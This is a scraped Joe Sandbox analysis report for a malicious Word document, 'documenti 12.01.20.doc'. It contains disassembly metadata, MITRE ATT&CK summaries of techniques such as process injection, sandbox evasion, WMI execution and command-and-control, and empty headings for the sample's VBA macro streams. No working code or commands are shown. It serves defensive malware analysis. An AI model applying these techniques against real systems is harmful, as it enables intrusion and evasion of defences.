GetCurrentProcessId.KERNEL32 ref: 000000013F2A1B52
GetCurrentThreadId.KERNEL32 ref: 000000013F2A1B5E
GetTickCount.KERNEL32 ref: 000000013F2A1B6A
GetTickCount.KERNEL32 ref: 000000013F2A1B7A
QueryPerformanceCounter.KERNEL32 ref: 000000013F2A1B95

Memory Dump Source

Source File: 00000002.00000002.2363433933.000000013F2A1000.00000020.00020000.sdmp, Offset: 000000013F2A0000, based on PE: true

Associated: 00000002.00000002.2363396090.000000013F2A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.2363468817.000000013F2A3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13f2a0000_ms.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: 2c2637000e3ca62ad49f1b68a64ec9a8e37ff38ddca1c2b232d396ed8eb87909
Instruction ID: d26e03de8f270dc9e486f851c024e4a6f1291d5533e82155c7ab47c798004fbb
Opcode Fuzzy Hash: 2c2637000e3ca62ad49f1b68a64ec9a8e37ff38ddca1c2b232d396ed8eb87909
Instruction Fuzzy Hash: 4311D632600F40CAEF10CF74E85579A33A4F759758F051A29EA6D86BA4EF78C2A98340

Uniqueness

Uniqueness Score: -1.00%

Function 000000013F2A1C04, Relevance: 4.5, APIs: 3, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 000000013F2A1C0F
UnhandledExceptionFilter.KERNEL32 ref: 000000013F2A1C18
GetCurrentProcess.KERNEL32 ref: 000000013F2A1C1E

Memory Dump Source

Source File: 00000002.00000002.2363433933.000000013F2A1000.00000020.00020000.sdmp, Offset: 000000013F2A0000, based on PE: true

Associated: 00000002.00000002.2363396090.000000013F2A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.2363468817.000000013F2A3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13f2a0000_ms.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CurrentProcess
String ID:
API String ID: 1249254920-0
Opcode ID: 017f04aa22c29246e795017d82a36724ae5871d56eff85f7b115c2aba92cf1f7
Instruction ID: b44ee800db4a7388a9e917bd1f136c5911667bdfbbd8ee7c6a8d1c0a870b81a1
Opcode Fuzzy Hash: 017f04aa22c29246e795017d82a36724ae5871d56eff85f7b115c2aba92cf1f7
Instruction Fuzzy Hash: E9E01233A05684C6FB1D1B617C2475A17209749B41F56403ACA1646371DE2CC96F9301

Uniqueness

Uniqueness Score: -1.00%

Function 000000013F2A40A0, Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2363468817.000000013F2A3000.00000002.00020000.sdmp, Offset: 000000013F2A0000, based on PE: true

Associated: 00000002.00000002.2363396090.000000013F2A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.2363433933.000000013F2A1000.00000020.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13f2a0000_ms.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a52ab5a90f94bdcb19d1f016bd81f557eedc52d221ab53ac5d77789cff0f17
Instruction ID: 5d35d6e71cff475b96f7291c11d669f97aafcd3e50637289b1e32b24b1537ea4
Opcode Fuzzy Hash: 52a52ab5a90f94bdcb19d1f016bd81f557eedc52d221ab53ac5d77789cff0f17
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report documenti 12.01.20.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1127

General

VBA Code Keywords

VBA Code

VBA File Name: a7A5m.bas, Stream Size: 5178

General

VBA Code Keywords

VBA Code

VBA File Name: aH8xms.bas, Stream Size: 863

General

VBA Code Keywords

VBA Code

VBA File Name: aIsb7.bas, Stream Size: 5040

General